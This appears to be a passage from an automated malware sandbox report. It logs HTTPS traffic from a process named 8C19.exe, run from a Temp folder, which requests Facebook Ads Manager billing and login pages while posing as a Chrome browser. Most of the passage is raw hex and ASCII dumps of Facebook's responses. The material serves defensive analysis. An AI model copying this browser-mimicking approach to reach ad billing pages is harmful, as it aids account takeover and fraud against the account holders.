5d 77 f1 68 10 88 03 a7 13 88 58 fc 13 88 5f f7 60 88 5d 8e 42 88 5d 8e 43 88 5d 8d 40 88 5d 8d 46 88 5d 8d
                                                                                                                                  Data Ascii: ]E\K\H\Iefyc0]w0]w0]w0]w0]w0]w0]w0]w0]w660]w0]w0]w0]w0]w0]whX_`]B]@]A]F]G]E\J\K\Iefzb0]w0]w0]w0]w0]w0]w0]w0]w0]w160]w0]w0]w0]w0]w0]whX_`]B]C]@]F]
                                                                                                                                  2022-10-17 20:07:18 UTC1045INData Raw: 4c e9 3c 29 63 27 65 a1 31 97 45 55 05 4b 03 9d 28 f2 6b d6 92 f1 f2 55 77 27 75 a5 78 1b 34 2d fc a8 b3 5e b0 47 d9 08 fc 40 bb 10 7f 9f e2 d6 b6 ca 09 4c 03 a4 b3 9d 75 ca 09 4d 02 54 1b 9c f4 4c ce 00 b5 a8 30 08 fc 40 63 0b 20 27 4d 55 f2 53 44 0a fc f1 3c d8 ac d8 60 0a 9f 6a cf a2 88 ff bb ad 9f 12 cf a2 88 97 c0 28 49 87 ef 9a 32 a4 51 5d 77 ac 3f ea 78 27 e1 52 c0 98 0b d6 b1 ca 0b 10 7f de 36 dc b5 4c cf 5d 77 ca 0b 28 7f de 35 58 97 53 30 5d 11 97 e0 28 79 ca b5 94 03 a9 b3 9a 75 47 ff 6e b7 47 33 6e b7 ec 6f 03 2c f1 f2 55 77 f9 bb b1 13 0d 00 5d 77 ac 66 0a fc ec 3c d6 0f a0 bb aa 88 d9 38 a2 01 9c d8 29 88 53 cf d8 b7 d8 3a d6 41 97 c7 28 9c 9f f0 b6 74 27 76 45 28 f2 6d 9f 73 ac 65 d6 9b 2d dc 79 73 ac 30 de 0a a4 30 0e 21 fb 3f d9 ab a9 30
                                                                                                                                  Data Ascii: L<)c'e1EUK(kUw'ux4-^G@LuMTL0@c 'MUSD<`j(I2Q]w?x'R6L]w(5XS0](yuGnG3no,Uw]wf<8)S:A(t'vE(mse-ys00!?0
                                                                                                                                  2022-10-17 20:07:18 UTC1053INData Raw: 37 10 37 14 37 18 37 1c 37 20 37 24 37 28 37 2c 37 30 37 34 37 38 37 3c 37 40 37 44 37 48 37 4c 37 50 37 54 37 58 37 5c 37 60 37 64 37 68 37 6c 37 70 37 74 37 78 37 7c 37 80 37 84 37 88 37 8c 37 90 37 94 37 98 37 9c 37 a0 37 a4 37 a8 37 b4 37 b8 37 bc 37 c0 37 c4 37 c8 37 cc 37 d0 37 d4 37 d8 37 dc 37 e0 37 e4 37 e8 37 ec 37 f0 37 f4 37 f8 37 fc 37 00 38 04 38 08 38 0c 38 10 38 14 38 18 38 1c 38 20 38 24 38 28 38 2c 38 30 38 34 38 38 38 3c 38 40 38 44 38 48 38 4c 38 50 38 54 38 58 38 5c 38 60 38 c4 3b cc 3b d4 3b dc 3b e4 3b ec 3b f4 3b fc 3b 04 3c 0c 3c 14 3c 1c 3c 24 3c 2c 3c 34 3c 3c 3c 44 3c 4c 3c 54 3c 5c 3c 64 3c 6c 3c 74 3c 7c 3c 84 3c 8c 3c 94 3c 9c 3c a4 3c a0 3d a4 3d a8 3d ac 3d b0 3d b4 3d b8 3d bc 3d c0 3d c4 3d c8 3d cc 3d d0 3d d4 3d d8 3d
                                                                                                                                  Data Ascii: 77777 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|777777777777777777777777777777788888888 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8;;;;;;;;<<<<$<,<4<<<D<L<T<\<d<l<t<|<<<<<<===============


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  8192.168.2.54970931.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:20 UTC1056OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:20 UTC1056INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:20 UTC1058INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  9192.168.2.54971031.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:20 UTC1060OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:20 UTC1060INHTTP/1.1 200 OK
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:20 UTC1062INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                  2022-10-17 20:07:20 UTC1063INData Raw: 63 65 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6d 71 36 6d 4f 76 59 54 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                                                                  Data Ascii: ce2d<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="mq6mOvYT">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                                                                  2022-10-17 20:07:20 UTC1065INData Raw: 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                                                                                  Data Ascii: com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https
                                                                                                                                  2022-10-17 20:07:20 UTC1066INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 53 2f 6c 2f 30 2c 63 72 6f 73 73 2f 74 35 5a 54 68 7a 32 42 34 77 4e 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 4b 41 6a 62 72 6c 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49
                                                                                                                                  Data Ascii: ="https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/t5ZThz2B4wN.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="KAjbrl/" crossorigin="anonymous" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/vcPqTiRwI
                                                                                                                                  2022-10-17 20:07:20 UTC1068INData Raw: 34 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 62 77 69 7a 57 67 44 61 46 51 75 64 6d 6e 39 77 22 7d 2c 22 31 31 36 37 33 39 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 70 4e 2d 74 6c 55 50 77 62 49 49 46 45 33 67 22 7d 2c 22 31 38 35 37 35 38 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 79 54 78 47 4d 70 36 6c 65 30 50 41 74 4f 6b 38 22 7d 2c 22 32 37 37 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 45 75 32 34 34 57 49 63 65 37 69 77 71 70 65 49 22 7d 2c 22 33 37 35 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 65 53 35 55 54 6b
                                                                                                                                  Data Ascii: 40":{"result":false,"hash":"AT5bwizWgDaFQudmn9w"},"1167394":{"result":false,"hash":"AT7BpN-tlUPwbIIFE3g"},"1857581":{"result":false,"hash":"AT5yTxGMp6le0PAtOk8"},"2772":{"result":false,"hash":"AT5Eu244WIce7iwqpeI"},"3752":{"result":false,"hash":"AT6eS5UTk
                                                                                                                                  2022-10-17 20:07:20 UTC1069INData Raw: 67 22 2c 5b 5d 2c 7b 22 63 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 63 70 70 6f 22 3a 7b 22 74 22 3a 38 36 34 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 64 70 72 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 69 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 73 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 73 74 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 53 74 72 69 63 74 22 7d 2c 22 69 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6c 6f 63 61 6c 65 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 6c
                                                                                                                                  Data Ascii: g",[],{"c_user":{"s":"None"},"cppo":{"t":86400,"s":"None"},"dpr":{"t":604800,"s":"None"},"fbl_ci":{"t":31536000,"s":"None"},"fbl_cs":{"t":31536000,"s":"None"},"fbl_st":{"t":31536000,"s":"Strict"},"i_user":{"s":"None"},"locale":{"t":604800,"s":"None"},"m_l
                                                                                                                                  2022-10-17 20:07:20 UTC1071INData Raw: 73 74 5f 62 61 73 65 5f 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 22 2c 22 6d 61 6e 69 66 65 73 74 5f 6f 72 69 67 69 6e 22 3a 6e 75 6c 6c 2c 22 62 65 5f 6f 6e 65 5f 61 68 65 61 64 22 3a 66 61 6c 73 65 2c 22 69 73 5f 72 74 6c 22 3a 66 61 6c 73 65 2c 22 69 73 5f 63 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 69 73 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 69 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 5f 6a 69 74 5f 77 61 72 6d 65 64 5f 75 70 22 3a 74 72 75 65 2c 22 68 73 69 22 3a 22 37 31 35 35 35 37 35 34 36 30 32 33 34 37 33 39 36 33 34 22 2c 22 73 65 6d 72 5f 68 6f 73 74 5f 62 75 63 6b 65 74 22 3a 22 33 22 2c 22 62 6c 5f 68 61 73 68 5f 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 6b 69 70 5f 72 64 5f 62
                                                                                                                                  Data Ascii: st_base_uri":"https:\/\/static.xx.fbcdn.net","manifest_origin":null,"be_one_ahead":false,"is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7155575460234739634","semr_host_bucket":"3","bl_hash_version":2,"skip_rd_b
                                                                                                                                  2022-10-17 20:07:20 UTC1072INData Raw: 4e 45 53 53 5f 47 52 41 50 48 5f 53 45 54 54 49 4e 47 5f 57 41 42 41 5f 41 53 53 49 47 4e 45 44 5f 55 53 45 52 53 5f 4e 45 57 5f 41 50 49 22 2c 22 41 44 53 5f 50 4c 41 43 45 4d 45 4e 54 5f 46 49 58 5f 50 55 42 4c 49 53 48 45 52 5f 50 4c 41 54 46 4f 52 4d 53 5f 4d 55 54 41 54 49 4f 4e 22 2c 22 46 4f 52 43 45 5f 46 45 54 43 48 5f 42 4f 4f 53 54 45 44 5f 43 4f 4d 50 4f 4e 45 4e 54 5f 41 46 54 45 52 5f 41 44 53 5f 43 52 45 41 54 49 4f 4e 22 2c 22 56 49 44 45 4f 5f 44 49 4d 45 4e 53 49 4f 4e 53 5f 46 52 4f 4d 5f 50 4c 41 59 45 52 5f 49 4e 5f 55 50 4c 4f 41 44 5f 44 49 41 4c 4f 47 22 2c 22 53 4e 49 56 59 5f 47 52 4f 55 50 5f 42 59 5f 45 56 45 4e 54 5f 54 52 41 43 45 5f 49 44 5f 41 4e 44 5f 4e 41 4d 45 22 2c 22 41 44 53 5f 53 54 4f 52 45 5f 56 49 53 49 54 53 5f
                                                                                                                                  Data Ascii: NESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API","ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION","FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME","ADS_STORE_VISITS_
                                                                                                                                  2022-10-17 20:07:20 UTC1074INData Raw: 74 6f 72 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 65 78 70 61 6e 64 6f 4b 65 79 22 3a 22 5f 5f 46 42 5f 53 54 4f 52 45 22 2c 22 75 73 65 45 78 70 61 6e 64 6f 22 3a 74 72 75 65 7d 2c 32 39 31 35 5d 2c 5b 22 43 6f 6f 6b 69 65 43 6f 72 65 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6d 61 78 69 6d 75 6d 49 67 6e 6f 72 61 62 6c 65 53 74 61 6c 6c 4d 73 22 3a 31 36 2e 36 37 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 39 2e 37 65 2d 35 2c 22 73 61 6d 70 6c 65 52 61 74 65 43 6c 61 73 73 69 63 22 3a 31 2e 30 65 2d 31 30 2c 22 73 61 6d 70 6c 65 52 61 74 65 46 61 73 74 53 74 61 6c 65 22 3a 31 2e 30 65 2d 38 7d 2c 33 34 30 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c
                                                                                                                                  Data Ascii: toreConfig",[],{"expandoKey":"__FB_STORE","useExpando":true},2915],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5,"sampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["ImmediateImplementationExperiments",[],
                                                                                                                                  2022-10-17 20:07:20 UTC1075INData Raw: 66 65 4b 70 72 6c 55 55 4f 31 51 53 30 6f 45 71 5a 68 30 79 22 2c 22 61 6c 6c 6f 77 6c 69 73 74 65 64 5f 69 66 72 61 6d 65 73 22 3a 5b 5d 7d 2c 35 35 34 30 5d 2c 5b 22 42 69 67 50 69 70 65 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 6c 69 6e 6b 5f 69 6d 61 67 65 73 5f 74 6f 5f 70 61 67 65 6c 65 74 73 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 62 69 67 70 69 70 65 5f 70 6c 75 67 69 6e 73 22 3a 66 61 6c 73 65 7d 2c 39 30 37 5d 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 5b 5d 2c 7b 22 64 69 73 61 62 6c 65 5f 76 61 72 69 61 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 36 35 33 33 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 72 65 74 72 79 4f 6e 4e 65 74 77 6f 72 6b 45 72 72 6f
                                                                                                                                  Data Ascii: feKprlUUO1QS0oEqZh0y","allowlisted_iframes":[]},5540],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkErro
                                                                                                                                  2022-10-17 20:07:20 UTC1077INData Raw: 73 5f 61 6e 64 72 6f 69 64 2e 6a 73 6f 6e 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 41 70 70 49 6e 76 69 74 65 73 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4f 41 75 74 68 53 68 69 6d 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4c 69 6b 65 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 71 70 5c 2f 69 6e 74 65 72 73 74 69 74 69 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 63 6c 6f 73 65 5c 2f 22 3a 31
                                                                                                                                  Data Ascii: s_android.json":0,"\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/":0,"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/":0,"\/connect\/jsdialog\/MPlatformLikeJSDialog\/":0,"\/qp\/interstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/":1
